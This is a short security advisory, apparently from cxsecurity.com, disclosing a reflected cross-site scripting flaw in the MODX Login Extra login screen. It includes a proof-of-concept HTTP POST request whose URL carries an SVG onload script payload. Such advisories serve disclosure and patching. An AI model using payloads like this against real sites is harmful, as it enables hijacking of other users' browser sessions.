MODX 2.3.5 Cross Site Scripting

2015.11.26
Credit: Veit Hailperin
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: MODX Cross-Site Scripting on Login Screen # Date: 2015/11/24 # Exploit Author: fenceposterror # Vendor Homepage: http://modx.com # Version: MODX Login Extra before Version 1.9.1. # CVE : 2015-6588 POST /login.html?a"><svg/onload=alert(1)> HTTP/1.1 Host: vulnerable-installation.tld Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 74 username=admin&password=admin&returnUrl=%2Fde%2F&service=login&Login=Login


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top